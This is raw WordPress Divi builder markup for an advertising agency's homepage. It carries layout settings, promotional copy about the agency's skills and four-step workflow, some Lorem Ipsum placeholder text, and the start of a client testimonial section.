text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" title_text=\"home-office-02\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"home-office-03\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" title_text=\"home-office-05\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04.jpg\" title_text=\"home-office-04\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" 